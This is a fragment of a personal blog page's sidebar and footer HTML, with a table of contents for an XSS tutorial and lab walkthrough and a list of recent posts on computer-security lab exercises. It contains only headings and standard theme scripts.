class="headline">Tags</div><div class="length-num">4</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Catalog</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">基础知识：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E6%9C%AC%E8%B4%A8%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-number">1.1.</span> <span class="toc-text">1、本质原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E4%B8%89%E5%A4%A7%E7%B1%BB%EF%BC%9A"><span class="toc-number">1.2.</span> <span class="toc-text">2、三大类：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E5%B8%B8%E8%A7%81%E6%94%BB%E5%87%BB%E6%89%8B%E6%B3%95%EF%BC%9A"><span class="toc-number">1.3.</span> <span class="toc-text">3、常见攻击手法：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#WAF%E7%BB%95%E8%BF%87%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">WAF绕过：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E5%B8%B8%E8%A7%84%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">1、常规思路：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7XSStrike%EF%BC%9A"><span class="toc-number">2.2.</span> <span class="toc-text">2、自动化工具XSStrike：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81-%E5%AE%89%E5%85%A8%E9%A2%84%E9%98%B2"><span class="toc-number">2.3.</span> <span class="toc-text">3、 安全预防</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSSLAB%E9%97%AF%E5%85%B3%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">XSSLAB闯关：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#level1%EF%BC%9A"><span class="toc-number">3.1.</span> <span class="toc-text">level1：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level2%EF%BC%9A"><span class="toc-number">3.2.</span> <span class="toc-text">level2：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level3%EF%BC%9A"><span class="toc-number">3.3.</span> <span class="toc-text">level3：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level4%EF%BC%9A"><span class="toc-number">3.4.</span> <span class="toc-text">level4：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level5%EF%BC%9A"><span class="toc-number">3.5.</span> <span class="toc-text">level5：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level6%EF%BC%9A"><span class="toc-number">3.6.</span> <span class="toc-text">level6：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level7%EF%BC%9A"><span class="toc-number">3.7.</span> <span class="toc-text">level7：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level8%EF%BC%9A"><span class="toc-number">3.8.</span> <span class="toc-text">level8：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level10%EF%BC%9A"><span class="toc-number">3.9.</span> <span class="toc-text">level10：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level11"><span class="toc-number">3.10.</span> <span class="toc-text">level11:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level2"><span class="toc-number">3.11.</span> <span class="toc-text">level2:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level13%EF%BC%9A"><span class="toc-number">3.12.</span> <span class="toc-text">level13：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level14%EF%BC%9A"><span class="toc-number">3.13.</span> <span class="toc-text">level14：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level15%EF%BC%9A"><span class="toc-number">3.14.</span> <span class="toc-text">level15：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level16%EF%BC%9A"><span class="toc-number">3.15.</span> <span class="toc-text">level16：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%9D%B6%E5%9C%BA%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">靶场：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E7%95%99%E8%A8%80%E6%9D%BF%EF%BC%9A"><span class="toc-number">4.1.</span> <span class="toc-text">1、留言板：</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Post</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/03_ShellShockAttack/" title="Lab02《计算机安全导论：深度实践》ShellShock实验">Lab02《计算机安全导论：深度实践》ShellShock实验</a><time datetime="2023-10-17T09:10:55.000Z" title="Created 2023-10-17 17:10:55">2023-10-17</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/03_ShellShock%E6%94%BB%E5%87%BB/" title="《计算机安全导论：深度实践》第三章ShellShock">《计算机安全导论：深度实践》第三章ShellShock</a><time datetime="2023-10-17T09:08:55.000Z" title="Created 2023-10-17 17:08:55">2023-10-17</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/02_Lab1%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E4%B8%8ESet-UID/" title="Lab1《计算机安全导论：深度实践》环境变量与Set-UID实验">Lab1《计算机安全导论：深度实践》环境变量与Set-UID实验</a><time datetime="2023-10-17T09:06:55.000Z" title="Created 2023-10-17 17:06:55">2023-10-17</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/02-%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F/" title="《计算机安全导论：深度实践》第二章环境变量">《计算机安全导论：深度实践》第二章环境变量</a><time datetime="2023-10-17T08:59:30.000Z" title="Created 2023-10-17 16:59:30">2023-10-17</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/17/01-Set-UID%E7%89%B9%E6%9D%83%E7%A8%8B%E5%BA%8F/" title="《计算机安全导论：深度实践》第一章Set-UID特权程序学习笔记">《计算机安全导论：深度实践》第一章Set-UID特权程序学习笔记</a><time datetime="2023-10-17T08:47:55.000Z" title="Created 2023-10-17 16:47:55">2023-10-17</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By John Doe</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle between single-column and double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.umd.min.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>